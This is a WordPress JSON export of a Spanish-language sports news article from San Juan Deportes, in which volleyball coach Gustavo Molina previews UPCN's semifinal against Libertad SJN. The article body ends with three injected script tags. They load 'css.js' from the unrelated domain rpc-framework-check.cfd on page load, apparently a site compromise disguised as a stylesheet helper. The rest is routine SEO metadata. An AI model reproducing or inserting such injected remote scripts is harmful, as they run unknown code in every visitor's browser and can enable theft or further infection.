{"id":22280,"date":"2025-02-26T21:03:01","date_gmt":"2025-02-27T00:03:01","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=22280"},"modified":"2026-02-02T19:17:19","modified_gmt":"2026-02-02T22:17:19","slug":"molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/","title":{"rendered":"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">El entrenador de UPCN San Juan V\u00f3ley, Gustavo Molina, palpit\u00f3 la continuidad de la serie de semifinales de la Liga Nacional, que tiene al equipo sanjuanino liderando por 2-0 ante Libertad SJN. Tras jugar en Santa Fe el fin de semana pasado, el cruce seguir\u00e1 ahora en San Juan y este viernes 28 de febrero, desde las 21 y en el estadio de Los C\u00f3ndores, el local buscar\u00e1 la clasificaci\u00f3n a la final de la Liga Nacional de V\u00f3leibol Masculino (LNVM). La entrada ser\u00e1 libre y gratuita.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">UPCN viene de superar a Libertad en el estadio La Calderita con triunfo por 3-0 en los dos partidos. Es por eso que, si este viernes repite la victoria, entonces cerrar\u00e1 la serie. En caso contrario, los eventuales cuarto y quinto partidos tambi\u00e9n ser\u00e1n en San Juan, el 1 y 2 de marzo.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u201cHab\u00edamos planificado que nosotros deb\u00edamos llevar las riendas del partido en condici\u00f3n de visitantes. Sab\u00edamos que \u00edbamos a jugar con mucho calor y buscamos adaptarnos el d\u00eda anterior con una pr\u00e1ctica corta e intenso, para emular el m\u00e1ximo cansancio que los jugadores pod\u00edan sentir\u201d, detall\u00f3 Molina sobre los partidos que abrieron la serie en San Jer\u00f3nimo Norte.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u201cSali\u00f3 bien, porque despu\u00e9s cerramos los partidos en una hora y media. Siempre fuimos protagonistas y superamos ese calor al que no est\u00e1bamos acostumbrados, que fue un punto alto en la ida. Los jugadores lo dieron todo, desde el primero al \u00faltimo, as\u00ed que eso fue importante para el equipo\u201d, a\u00f1adi\u00f3.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La serie se definir\u00e1 ahora en San Juan y UPCN buscar\u00e1 aprovechar la local\u00eda en su estadio de calle General Acha. \u201cEn casa, en la cancha en la que siempre entrenamos y con nuestra gente alentando, esperamos cerrarlo. Despu\u00e9s de ganar dos partidos por 3-0 quiz\u00e1s no tenemos muchas cosas por corregir, pero siempre se puede mejorar para que el partido salga m\u00e1s limpio y lindo; a la vez que vamos nivelando entre descanso y entrenamiento para llegar de la mejor manera\u201d, destac\u00f3 el entrenador.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>El entrenador de UPCN San Juan V\u00f3ley, Gustavo Molina, palpit\u00f3 la continuidad de la serie de semifinales de la Liga Nacional, que tiene al equipo sanjuanino liderando por 2-0 ante Libertad SJN. Tras jugar en Santa Fe el fin de semana pasado, el cruce seguir\u00e1 ahora en San Juan y este viernes 28 de febrero, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":22281,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[178,34],"tags":[],"class_list":["post-22280","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-san-juan","category-voley"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"El entrenador de UPCN San Juan V\u00f3ley, Gustavo Molina, palpit\u00f3 la continuidad de la serie de semifinales de la Liga Nacional, que tiene al equipo sanjuanino liderando por 2-0 ante Libertad SJN. Tras jugar en Santa Fe el fin de semana pasado, el cruce seguir\u00e1 ahora en San Juan y este viernes 28 de febrero, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-02-27T00:03:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:17:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"728\" \/>\n\t<meta property=\"og:image:height\" content=\"485\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales\",\"datePublished\":\"2025-02-27T00:03:01+00:00\",\"dateModified\":\"2026-02-02T22:17:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/\"},\"wordCount\":364,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp\",\"articleSection\":[\"San Juan\",\"Voley\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/\",\"name\":\"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp\",\"datePublished\":\"2025-02-27T00:03:01+00:00\",\"dateModified\":\"2026-02-02T22:17:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp\",\"width\":728,\"height\":485},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/26\\\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/","og_locale":"es_ES","og_type":"article","og_title":"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales - San Juan Deportes","og_description":"El entrenador de UPCN San Juan V\u00f3ley, Gustavo Molina, palpit\u00f3 la continuidad de la serie de semifinales de la Liga Nacional, que tiene al equipo sanjuanino liderando por 2-0 ante Libertad SJN. Tras jugar en Santa Fe el fin de semana pasado, el cruce seguir\u00e1 ahora en San Juan y este viernes 28 de febrero, [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-02-27T00:03:01+00:00","article_modified_time":"2026-02-02T22:17:19+00:00","og_image":[{"width":728,"height":485,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp","type":"image\/webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/"},"author":{"name":"admin","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales","datePublished":"2025-02-27T00:03:01+00:00","dateModified":"2026-02-02T22:17:19+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/"},"wordCount":364,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp","articleSection":["San Juan","Voley"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/","name":"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp","datePublished":"2025-02-27T00:03:01+00:00","dateModified":"2026-02-02T22:17:19+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-26-at-7.11.24-PM-728x485-1.webp","width":728,"height":485},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/26\/molina-el-dt-de-upcn-palpito-la-continuidad-de-la-serie-de-semifinales\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Molina, el DT de UPCN, palpit\u00f3 la continuidad de la serie de semifinales"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=22280"}],"version-history":[{"count":4,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22280\/revisions"}],"predecessor-version":[{"id":29096,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22280\/revisions\/29096"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/22281"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=22280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=22280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=22280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}